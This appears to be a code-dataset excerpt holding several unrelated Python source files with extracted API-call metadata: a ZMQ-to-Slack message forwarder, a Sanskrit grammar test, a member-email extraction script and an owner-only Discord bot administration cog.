8b61de4864ffed2d7ee224c283090ed1948533ae
# # -*- coding: utf-8-*- # receives messages via zmq and executes some simple # operations. # # (c) ISC Clemenz & Weinbrecht GmbH 2018 # import json import requests import zmq import pmon class ZmqResponder(object): context = None socket = None def __init__(self): """ Constructor. """ self.cfg = pmon.CFG self.log = pmon.LOG def __enter__(self): self.bind() return self def __exit__(self, exc_type, exc_val, exc_tb): self.done() def bind(self): self.log.info("Binding ZMQ") port = self.cfg['pmon']['zmq.port'] bind_str = "tcp://*:{0}".format(port) self.context = zmq.Context(1) self.socket = self.context.socket(zmq.REP) self.socket.bind(bind_str) def done(self): self.log.info("Disconnecting ZMQ") if self.socket is not None: self.socket.close() if self.context is not None: self.context.term() def _read_message(self): self.log.debug("Wait for incoming message") msg = self.socket.recv() _msg = msg.decode('utf-8') return json.loads(_msg) @staticmethod def _make_slack_payload(message): slack_payload = dict() slack_payload['text'] = message['msg'] attachments = list() slack_payload['attachments'] = attachments attachment = dict() attachment["fallback"] = message['msg'] attachment['text'] = message['msg'] attachment['title'] = message['msg.type'] attachment['author_name'] = message['from'] attachments.append(attachment) return slack_payload def _report_message_to_slack(self, message): """ Send a message to Slack Web-Hook. :param message: the message record to be send to slack :return: None """ self.log.debug("Forwarding message to slack") url = self.cfg['pmon']['slack.hook'] payload = json.dumps(self._make_slack_payload(message)) headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'Content-Encoding': 'utf8', 'Content-Length': str(len(payload))} try: rsp = requests.post(url, data=payload, headers=headers) if rsp.status_code != requests.codes.ok: self.log.warn("problem sending to slack: {0}".format(rsp.status_code)) except Exception as x: self.log.error(str(x)) def respond(self): go_on = True while go_on: message = self._read_message() self.log.debug("Message: {0}, {1}".format(message['msg.type'], message['msg'])) self.socket.send_string('ACK') try: self._report_message_to_slack(message) except Exception as x: self.log.error(str(x)) go_on = True if message['msg'] != 'stop' else False
[((693, 707), 'zmq.Context', 'zmq.Context', (['(1)'], {}), '(1)\n', (704, 707), False, 'import zmq\n'), ((1160, 1176), 'json.loads', 'json.loads', (['_msg'], {}), '(_msg)\n', (1170, 1176), False, 'import json\n'), ((2287, 2336), 'requests.post', 'requests.post', (['url'], {'data': 'payload', 'headers': 'headers'}), '(url, data=payload, headers=headers)\n', (2300, 2336), False, 'import requests\n')]
sanskrit/padmini
test/test_substitute.py
8e7e8946a7d2df9c941f689ea4bc7b6ebb7ca1d0
from padmini import operations as op def test_yatha(): before = ("tAs", "Tas", "Ta", "mip") after = ("tAm", "tam", "ta", "am") for i, b in enumerate(before): assert op.yatha(b, before, after) == after[i] """ def test_ti(): assert S.ti("ta", "e") == "te" assert S.ti("AtAm", "e") == "Ate" def test_antya(): assert S.antya("ti", "u") == "tu" assert S.antya("te", "Am") == "tAm" """
[((188, 214), 'padmini.operations.yatha', 'op.yatha', (['b', 'before', 'after'], {}), '(b, before, after)\n', (196, 214), True, 'from padmini import operations as op\n')]
kmhambleton/LSST-TVSSC.github.io
TVSaffiliations/extractemails_nogui.py
2391fcdeddf83321825532aa7d7682b5dcf567f0
# coding: utf-8 #just prints the emails of members of a group to stdout, #both primary and secondary members # run as # $python extractemails_nogui.py "Tidal Disruption Events" from __future__ import print_function '__author__' == 'Federica Bianco, NYU - GitHub: fedhere' import sys import pandas as pd from argparse import ArgumentParser from config import tvsfile def parse_args(subglist): """ Use ArgParser to build up the arguments we will use in our script """ stored_args = {} # get the script name without the extension & use it to build up # the json filename parser = ArgumentParser(description='Selecting members by subgroup') parser.add_argument('subgroup', action='store', default=None, help='Choose the subgroup affiliation:' + ' -- '.join([s for s in subglist])) args = parser.parse_args() return args if __name__ == '__main__': if tvsfile is None: print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)") sys.exit() TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' + tvsfile + '/export?gid=0&format=csv', index_col=0) subgroups = TVSMembers.primary.unique() conf = parse_args([x for x in subgroups if str(x) != 'nan']) primary = conf.subgroup secondary = conf.subgroup emails = TVSMembers[TVSMembers.primary == primary]['email'].values print ("These are the members with primary affiliation with " + primary) print ("") print (' '.join([em + ','for em in emails])) emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values print ("\n") print ("These are the members with secondary affiliation with " + secondary) print ("") print (' '.join([em + ','for em in emails])) print ("") print ("If you also want their names and affiliations use: ") print ("$python extractemailsW.py " + conf.subgroup)
[((604, 663), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Selecting members by subgroup"""'}), "(description='Selecting members by subgroup')\n", (618, 663), False, 'from argparse import ArgumentParser\n'), ((1147, 1257), 'pandas.read_csv', 'pd.read_csv', (["('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv')"], {'index_col': '(0)'}), "('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv', index_col=0)\n", (1158, 1257), True, 'import pandas as pd\n'), ((1118, 1128), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1126, 1128), False, 'import sys\n')]
Obsidian-Development/JDBot
cogs/owner.py
315b0782126ac36fe934ac3ba2d7132710d58651
from discord.ext import commands, menus import utils import random , discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy import traceback, textwrap from discord.ext.menus.views import ViewMenuPages class Owner(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command(brief="a command to send mail") async def mail(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.reply("User not found, returning Letter") user = ctx.author if user: await ctx.reply("Please give me a message to use.") message = await self.bot.wait_for("message",check = utils.check(ctx)) embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215)) embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url)) embed_message.set_footer(text = f"{ctx.author.id}") embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png") if (user.dm_channel is None): await user.create_dm() try: await user.send(embed=embed_message) except: user = ctx.author await user.send(content="Message failed. sending",embed=embed_message) embed_message.add_field(name="Sent To:",value=str(user)) await self.bot.get_channel(855217084710912050).send(embed=embed_message) @commands.command() async def load(self, ctx, *, cog = None): if cog: try: self.bot.load_extension(cog) except Exception as e: await ctx.send(e) traceback.print_exc() await ctx.send("Loaded cog(see if there's any errors)") if cog is None: await ctx.send("you can't ask to load no cogs.") @commands.command() async def reload(self, ctx, *, cog = None): cog = cog or "all" if cog == "all": for x in list(self.bot.extensions): try: self.bot.reload_extension(x) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("done reloading all cogs(check for any errors)") else: try: self.bot.reload_extension(cog) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("Cog reloaded :D (check for any errors)") @commands.command() async def unload(self, ctx, *, cog = None): if cog: try: self.bot.unload_extension(cog) except commands.errors.ExtensionError as e: await ctx.send(e) traceback.print_exc() await ctx.send("Cog should be unloaded just fine :D.(check any errors)") if cog is None: await ctx.send("you can't ask to reload no cogs") @commands.command() async def shutdown(self, ctx): await ctx.send("shutdown/logout time happening.") await self.bot.close() async def cog_check(self, ctx): return await self.bot.is_owner(ctx.author) async def cog_command_error(self, ctx, error): if ctx.command or not ctx.command.has_error_handler(): await ctx.send(error) traceback.print_exc() #I need to fix all cog_command_error @commands.command(brief="Changes Bot Status(Owner Only)") async def status(self , ctx , * , args=None): if await self.bot.is_owner(ctx.author): if args: await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args)) if args is None: await self.bot.change_presence(status=discord.Status.do_not_disturb) if await self.bot.is_owner(ctx.author) is False: await ctx.send("That's an owner only command") @commands.command(brief="Only owner command to change bot's nickname") async def change_nick(self, ctx ,*, name=None): if await self.bot.is_owner(ctx.author): if isinstance(ctx.channel, discord.TextChannel): await ctx.send("Changing Nickname") try: await ctx.guild.me.edit(nick=name) except discord.Forbidden: await ctx.send("Appears not to have valid perms") if isinstance(ctx.channel,discord.DMChannel): await ctx.send("You can't use that in Dms.") if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that command") class ServersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215)) return embed @commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)") async def servers(self, ctx): if await self.bot.is_owner(ctx.author): pag = commands.Paginator() for g in self.bot.guilds: pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}") pages = [page.strip("`") for page in pag.pages] menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that it's owner only") @commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook") async def webhook_update(self, ctx, *, args = None): if await self.bot.is_owner(ctx.author): if args: if isinstance(ctx.channel, discord.TextChannel): try: await ctx.message.delete() except: await ctx.send("It couldn't delete the message in this guils so, I kept it here.") webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session) embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at)) embed.add_field(name="Update Info:",value=args) embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png') embed.set_footer(text="JDJG's Updates") await webhook.send(embed=embed) webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session) embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at)) embed.add_field(name="Update Info:",value=args) embed.set_author(name="JDJG's Update",icon_url='https://i.imgur.com/pdQkCBv.png') embed.set_footer(text="JDJG's Updates") await webhook.send(embed=embed) if args is None: await ctx.send("You sadly can't use it like that.") if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that") @commands.command(brief="Commands to see what guilds a person is in.") async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None): user = user or ctx.author pag = commands.Paginator() for g in user.mutual_guilds: pag.add_line(f"{g}") pages = [page.strip("`") for page in pag.pages] pages = pages or ["No shared servers"] menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) @commands.command(brief="A command to add sus_users with a reason") async def addsus(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("can't have a user be none.") if user: await ctx.reply("Please give me a reason why:") reason = await self.bot.wait_for("message",check= utils.check(ctx)) cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content)) await self.bot.sus_users.commit() await cur.close() await ctx.send("added sus users, succesfully") @commands.command(brief="a command to remove sus users.") async def removesus(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a none user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,)) await self.bot.sus_users.commit() await cur.close() await ctx.send("Removed sus users.") class SusUsersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215)) embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False) return embed @commands.command(brief="a command to grab all in the sus_users list") async def sus_users(self, ctx): cur = await self.bot.sus_users.cursor() cursor = await cur.execute("SELECT * FROM SUS_USERS;") sus_users = tuple(await cursor.fetchall()) await cur.close() await self.bot.sus_users.commit() menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True) await menu.start(ctx) @sus_users.error async def sus_users_error(self, ctx, error): await ctx.send(error) class TestersEmbed(menus.ListPageSource): async def format_page(self, menu, item): embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215)) embed.add_field(name = "User ID:", value = f"{item}", inline = False) return embed @commands.command(brief = "a command listed all the commands") async def testers(self, ctx): menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True) await menu.start(ctx) @commands.command() async def update_sus(self, ctx): await self.bot.sus_users.commit() await ctx.send("Updated SQL boss.") @update_sus.error async def update_sus_error(self, ctx, error): await ctx.send(error) @commands.command(aliases=["bypass_command"]) async def command_bypass(self, ctx ,user: utils.BetterUserconverter = None, *, command = None): #make sure to swap to autoconverter if it gets added. user = user or ctx.author if command: command_wanted=self.bot.get_command(command) if command_wanted: await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!") self.bot.special_access[user.id]=command_wanted.name if command_wanted is None: await ctx.send("Please specify a valid command.") if command is None: await ctx.send("select a command :(") @commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"]) async def resetcooldown(self, ctx, *, command = None): if not command: return await ctx.send("please specificy a command") command_wanted = self.bot.get_command(command) if not command_wanted: return await ctx.send("please specify a command") if not command_wanted.is_on_cooldown(ctx): return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.") command_wanted.reset_cooldown(ctx) await ctx.send(f"reset cooldown of {command_wanted}") @commands.command(brief = "leaves a guild only use when needed or really wanted. Otherwise no thanks.") async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None): guild = guild or ctx.guild if guild is None: return await ctx.send("Guild is None can't do anything.") await ctx.send("Bot leaving guild :(") try: await guild.leave() except Exception as e: await ctx.send(f"Somehow an error occured: {e}") traceback.print_exc() @commands.command() async def aioinput_test(self, ctx, *, args = None): args = args or "Test" result=await self.bot.loop.run_in_executor(None, input, (f"{args}:")) await ctx.send(f"Result of the input was {result}") @commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.") async def reload_basic(self, ctx, *, args = None): if args is None:await ctx.send("Can't reload module named None") if args: try: module = importlib.import_module(name=args) except Exception as e: traceback.print_exc() return await ctx.send(e) try: value=importlib.reload(module) except Exception as e: traceback.print_exc() return await ctx.send(e) await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}") @commands.command(brief="backs up a channel and then sends it into a file or mystbin") async def channel_backup(self, ctx): messages = await ctx.channel.history(limit = None, oldest_first = True).flatten() new_line = "\n" page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages) mystbin_client = mystbin.Client(session = self.bot.session) paste = await mystbin_client.post(page) await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}") @channel_backup.error async def channel_backup_error(self, ctx, error): etype = type(error) trace = error.__traceback__ values=''.join(map(str,traceback.format_exception(etype, error, trace))) pages = textwrap.wrap(values, width = 1992) menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) mystbin_client = mystbin.Client(session=self.bot.session) paste = await mystbin_client.post(values) await ctx.send(f"Traceback: {paste.url}") @commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"]) async def addrtfm(self, ctx, name = None, *, url = None): if not name or not url or not name and not url: return await ctx.send("You need a name and also url.") cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url)) await self.bot.sus_users.commit() await cur.close() await ctx.send(f"added {name} and {url} to the rtfm DB") @commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"]) async def removertfm(self, ctx, *, name = None): if name is None: return await ctx.send("You can't remove None") cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,)) await self.bot.sus_users.commit() await cur.close() await ctx.send(f"Removed the rfm value {name}.") @commands.command(brief = "a command to save images to imgur(for owner only lol)") async def save_image(self, ctx): if not ctx.message.attachments: return await ctx.send("You need to provide some attachments.") await ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?") for x in ctx.message.attachments: try: discord.utils._get_mime_type_for_image(await x.read()) except Exception as e: traceback.print_exc() return await ctx.send(e) imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"]) imgur_url = await imgur_client.upload(await x.read()) await ctx.send(f"{imgur_url['link']}") @commands.command(brief="A command to remove testers") async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a non existent user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,)) await self.bot.sus_users.commit() await cur.close() if not user.id in self.bot.testers: return await ctx.send(f"{user} isn't in the testers list.") else: self.bot.testers.remove(user.id) await ctx.send(f"Removed tester known as {user}") @commands.command(brief="A command to add testers") async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a non existent user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,)) await self.bot.sus_users.commit() await cur.close() if not user.id in self.bot.testers: self.bot.testers.append(user.id) await ctx.send(f"added tester known as {user}") else: return await ctx.send(f"{user} is in the testers list already!") def tweepy_post(self, post_text = None): consumer_key = os.getenv('tweet_key') consumer_secret = os.getenv('tweet_secret') auth = tweepy.OAuthHandler(consumer_key, consumer_secret) access_token = os.getenv('tweet_access') access_secret = os.getenv('tweet_token') auth.set_access_token(access_token, access_secret) twitter_api = tweepy.API(auth) return twitter_api.update_status(status = post_text) @commands.command(brief = "sends tweet to JDBot Twitter") async def send_tweet(self, ctx, *, args = None): if not args: return await ctx.send("you can't send nothing to twitter.") try: tweet_time = functools.partial(self.tweepy_post, args) post = await self.bot.loop.run_in_executor(None, tweet_time) except Exception as e: traceback.print_exc() return await ctx.send(f"Exception occured at {e}") await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}") @commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)") async def chunk_guild(self, ctx): if ctx.guild is None: return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.") if ctx.guild.chunked: return await ctx.send("No need to chunk this guild, it appears to be chunked") await ctx.guild.chunk(cache = True) await ctx.send("Finished chunking..") @chunk_guild.error async def chunk_guild_error(self, ctx, error): await ctx.send(error) traceback.print_exc() @commands.command(brief = "displays the guild status and user status immediately") async def stats_status(self, ctx): await ctx.send("changing status, check now....") await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users")) @stats_status.error async def stats_status_error(self, ctx, error): await ctx.send(error) @commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.") async def servers2(self, ctx): if await self.bot.is_owner(ctx.author): sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at) pag = commands.Paginator() for g in sorted_guilds: pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n") pages = [page.strip("`") for page in pag.pages] menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that it's owner only") def setup(bot): bot.add_cog(Owner(bot))
[((293, 341), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to send mail"""'}), "(brief='a command to send mail')\n", (309, 341), False, 'from discord.ext import commands, menus\n'), ((1418, 1436), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1434, 1436), False, 'from discord.ext import commands, menus\n'), ((1771, 1789), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1787, 1789), False, 'from discord.ext import commands, menus\n'), ((2401, 2419), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (2417, 2419), False, 'from discord.ext import commands, menus\n'), ((2793, 2811), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (2809, 2811), False, 'from discord.ext import commands, menus\n'), ((3226, 3282), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Changes Bot Status(Owner Only)"""'}), "(brief='Changes Bot Status(Owner Only)')\n", (3242, 3282), False, 'from discord.ext import commands, menus\n'), ((3753, 3822), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Only owner command to change bot\'s nickname"""'}), '(brief="Only owner command to change bot\'s nickname")\n', (3769, 3822), False, 'from discord.ext import commands, menus\n'), ((4596, 4721), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to give a list of servers(owner only)"""', 'help': '"""Gives a list of guilds(Bot Owners only)"""'}), "(brief='a command to give a list of servers(owner only)',\n help='Gives a list of guilds(Bot Owners only)')\n", (4612, 4721), False, 'from discord.ext import commands, menus\n'), ((5407, 5520), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""only works with JDJG, but this command is meant to send updates to my webhook"""'}), "(brief=\n 'only works with JDJG, but this command is meant to send updates to my webhook'\n )\n", (5423, 5520), False, 'from discord.ext import commands, menus\n'), ((6895, 6964), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Commands to see what guilds a person is in."""'}), "(brief='Commands to see what guilds a person is in.')\n", (6911, 6964), False, 'from discord.ext import commands, menus\n'), ((7503, 7569), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to add sus_users with a reason"""'}), "(brief='A command to add sus_users with a reason')\n", (7519, 7569), False, 'from discord.ext import commands, menus\n'), ((8115, 8171), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to remove sus users."""'}), "(brief='a command to remove sus users.')\n", (8131, 8171), False, 'from discord.ext import commands, menus\n'), ((8906, 8975), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to grab all in the sus_users list"""'}), "(brief='a command to grab all in the sus_users list')\n", (8922, 8975), False, 'from discord.ext import commands, menus\n'), ((9723, 9782), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command listed all the commands"""'}), "(brief='a command listed all the commands')\n", (9739, 9782), False, 'from discord.ext import commands, menus\n'), ((9953, 9971), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (9969, 9971), False, 'from discord.ext import commands, menus\n'), ((10184, 10228), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "['bypass_command']"}), "(aliases=['bypass_command'])\n", (10200, 10228), False, 'from discord.ext import commands, menus\n'), ((10833, 10911), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""resets cooldown for you."""', 'aliases': "['reset_cooldown']"}), "(brief='resets cooldown for you.', aliases=['reset_cooldown'])\n", (10849, 10911), False, 'from discord.ext import commands, menus\n'), ((11421, 11531), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""leaves a guild only use when needed or really wanted. Otherwise no thanks."""'}), "(brief=\n 'leaves a guild only use when needed or really wanted. Otherwise no thanks.'\n )\n", (11437, 11531), False, 'from discord.ext import commands, menus\n'), ((11918, 11936), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (11934, 11936), False, 'from discord.ext import commands, menus\n'), ((12152, 12250), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a powerful owner tool to reload local files that aren\'t reloadable."""'}), '(brief=\n "a powerful owner tool to reload local files that aren\'t reloadable.")\n', (12168, 12250), False, 'from discord.ext import commands, menus\n'), ((12770, 12860), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""backs up a channel and then sends it into a file or mystbin"""'}), "(brief=\n 'backs up a channel and then sends it into a file or mystbin')\n", (12786, 12860), False, 'from discord.ext import commands, menus\n'), ((14182, 14268), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""adds packages and urls to rtfm DB"""', 'aliases': "['add_rtfm']"}), "(brief='adds packages and urls to rtfm DB', aliases=[\n 'add_rtfm'])\n", (14198, 14268), False, 'from discord.ext import commands, menus\n'), ((14690, 14779), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""removes packages from the rtfm DB"""', 'aliases': "['remove_rtfm']"}), "(brief='removes packages from the rtfm DB', aliases=[\n 'remove_rtfm'])\n", (14706, 14779), False, 'from discord.ext import commands, menus\n'), ((15143, 15222), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to save images to imgur(for owner only lol)"""'}), "(brief='a command to save images to imgur(for owner only lol)')\n", (15159, 15222), False, 'from discord.ext import commands, menus\n'), ((15904, 15957), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to remove testers"""'}), "(brief='A command to remove testers')\n", (15920, 15957), False, 'from discord.ext import commands, menus\n'), ((16560, 16610), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to add testers"""'}), "(brief='A command to add testers')\n", (16576, 16610), False, 'from discord.ext import commands, menus\n'), ((17645, 17699), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""sends tweet to JDBot Twitter"""'}), "(brief='sends tweet to JDBot Twitter')\n", (17661, 17699), False, 'from discord.ext import commands, menus\n'), ((18195, 18331), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""chunks a guild for the purpose of testing purpose(it\'s owner only to be used in testing guilds only)"""'}), '(brief=\n "chunks a guild for the purpose of testing purpose(it\'s owner only to be used in testing guilds only)"\n )\n', (18211, 18331), False, 'from discord.ext import commands, menus\n'), ((18813, 18892), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""displays the guild status and user status immediately"""'}), "(brief='displays the guild status and user status immediately')\n", (18829, 18892), False, 'from discord.ext import commands, menus\n'), ((19293, 19452), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to give a list of servers(owner only)"""', 'help': '"""Gives a list of guilds(Bot Owners only) but with join dates updated."""'}), "(brief='a command to give a list of servers(owner only)',\n help='Gives a list of guilds(Bot Owners only) but with join dates updated.'\n )\n", (19309, 19452), False, 'from discord.ext import commands, menus\n'), ((7085, 7105), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (7103, 7105), False, 'from discord.ext import commands, menus\n'), ((13364, 13404), 'mystbin.Client', 'mystbin.Client', ([], {'session': 'self.bot.session'}), '(session=self.bot.session)\n', (13378, 13404), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((13757, 13790), 'textwrap.wrap', 'textwrap.wrap', (['values'], {'width': '(1992)'}), '(values, width=1992)\n', (13770, 13790), False, 'import traceback, textwrap\n'), ((14044, 14084), 'mystbin.Client', 'mystbin.Client', ([], {'session': 'self.bot.session'}), '(session=self.bot.session)\n', (14058, 14084), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17266, 17288), 'os.getenv', 'os.getenv', (['"""tweet_key"""'], {}), "('tweet_key')\n", (17275, 17288), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17311, 17336), 'os.getenv', 'os.getenv', (['"""tweet_secret"""'], {}), "('tweet_secret')\n", (17320, 17336), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17349, 17399), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['consumer_key', 'consumer_secret'], {}), '(consumer_key, consumer_secret)\n', (17368, 17399), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17420, 17445), 'os.getenv', 'os.getenv', (['"""tweet_access"""'], {}), "('tweet_access')\n", (17429, 17445), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17466, 17490), 'os.getenv', 'os.getenv', (['"""tweet_token"""'], {}), "('tweet_token')\n", (17475, 17490), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17566, 17582), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (17576, 17582), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((18784, 18805), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18803, 18805), False, 'import traceback, textwrap\n'), ((3158, 3179), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3177, 3179), False, 'import traceback, textwrap\n'), ((4806, 4826), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (4824, 4826), False, 'from discord.ext import commands, menus\n'), ((7289, 7331), 'utils.mutualGuildsEmbed', 'utils.mutualGuildsEmbed', (['pages'], {'per_page': '(1)'}), '(pages, per_page=1)\n', (7312, 7331), False, 'import utils\n'), ((13819, 13854), 'utils.ErrorEmbed', 'utils.ErrorEmbed', (['pages'], {'per_page': '(1)'}), '(pages, per_page=1)\n', (13835, 13854), False, 'import utils\n'), ((15721, 15793), 'aioimgur.ImgurClient', 'aioimgur.ImgurClient', (["os.environ['imgur_id']", "os.environ['imgur_secret']"], {}), "(os.environ['imgur_id'], os.environ['imgur_secret'])\n", (15741, 15793), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17870, 17911), 'functools.partial', 'functools.partial', (['self.tweepy_post', 'args'], {}), '(self.tweepy_post, args)\n', (17887, 17911), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19618, 19638), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (19636, 